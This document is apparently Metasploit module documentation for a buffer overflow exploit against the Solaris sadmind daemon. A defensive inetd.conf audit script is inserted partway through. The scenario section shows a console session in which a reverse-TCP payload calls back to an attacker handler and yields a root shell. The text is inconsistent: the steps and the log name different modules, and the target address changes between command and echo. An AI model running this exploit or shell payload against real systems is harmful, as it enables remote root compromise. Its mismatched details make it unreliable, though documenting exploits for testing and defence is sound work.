Vulnerable Application
This module exploits a buffer overflow vulnerability in the adm_build_path()
function of the Sun Solstice AdminSuite sadmind daemon.
The distributed system administration daemon (sadmind) is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations.
The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received. The sadmind daemon process continues to run for 15 minutes after the last request is completed, unless a different idle-time is specified with the -i command line option. The sadmind daemon may be started independently from the command line, for example, at system boot time. In this case, the -i option has no effect; sadmind continues to run, even if there are no active requests.
This module has been successfully tested on:
- Solaris 9u2 12/02 (x86);
- Solaris 9u7 09/04 (x86);
- Solaris 9u8 09/05 (x86).
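For defenders, the inetd-managed startup described above can be audited from configuration. The following is an added example (not part of the module or its documentation) that lists enabled sadmind entries in inetd.conf-style text along with any -i idle setting; the field layout, the 100232/10 RPC program/version identifier and the sample lines are assumptions based on standard Solaris configuration and are constructed for illustration.

```sh
#!/bin/sh
# Added example: report enabled sadmind entries in inetd.conf-style input.
# Assumed field layout (standard Solaris inetd.conf):
#   service socket-type proto wait-status user server-program argv0 [args...]

# Print one line per enabled entry: "<service> idle=<value>".
# <value> is the argument of -i, or "default(15m)" when -i is absent.
# Reads the files given as arguments, or stdin when none are given.
audit_sadmind() {
    awk '
        $1 ~ /^#/ || NF < 6 { next }        # skip comments and short lines
        $6 ~ "(^|/)sadmind$" {              # server program is sadmind
            idle = "default(15m)"
            for (i = 7; i <= NF; i++) {
                if ($i == "-i" && i < NF) { idle = $(i + 1) }   # "-i 60"
                else if ($i ~ /^-i./)     { idle = substr($i, 3) } # "-i60"
            }
            print $1 " idle=" idle
        }
    ' "$@"
}

# Constructed sample input (not taken from a real host): one enabled
# sadmind entry, one commented-out entry, one unrelated RPC service.
sample_inetd_conf() {
    cat <<'EOF'
# constructed sample inetd.conf fragment
100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind
#100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -i 60
100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd
EOF
}

# Demonstration on the constructed sample; on a host, run instead:
#   audit_sadmind /etc/inet/inetd.conf
sample_inetd_conf | audit_sadmind
```

An empty result means no enabled sadmind entry was found in the input; commenting the entry out and having inetd reread its configuration is the usual way to disable the service where AdminSuite is not needed.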
Verification Steps
- Start msfconsole
- Do: use exploit/solaris/sunrpc/sadmind_adm_build_path
- Do: set rhosts [rhost]
- Do: exploit
- You should get a new session as the root user.
Options
Scenarios
Solaris 9u2 12/02 s9x_u2wos_10 (x86)
msf > use exploit/solaris/sunrpc/sadmind_exec
msf exploit(solaris/sunrpc/sadmind_exec) > set rhosts 192.168.200.155
rhosts => 192.168.200.148
msf exploit(solaris/sunrpc/sadmind_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(solaris/sunrpc/sadmind_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.155:111 - Creating nop block...
[*] 192.168.200.155:111 - Trying to exploit sadmind with address 0x08062030...
[-] 192.168.200.155:111 - 192.168.200.155:111 - SunRPC - No response to SunRPC call for procedure: 1
[*] 192.168.200.155:111 - Trying to exploit sadmind with address 0x08069830...
[-] 192.168.200.155:111 - 192.168.200.155:111 - SunRPC - No response to SunRPC call for procedure: 1
[*] 192.168.200.155:111 - Trying to exploit sadmind with address 0x08071030...
[-] 192.168.200.155:111 - 192.168.200.155:111 - SunRPC - No response to SunRPC call for procedure: 1
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.155:32842) at 2025-04-21 08:18:47 -0400
id
uid=0(root) gid=0(root)
uname -a
SunOS unknown 5.9 Generic_112234-03 i86pc i386 i86pc
cat /etc/release
Solaris 9 12/02 s9x_u2wos_10 x86
Copyright 2002 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 05 November 2002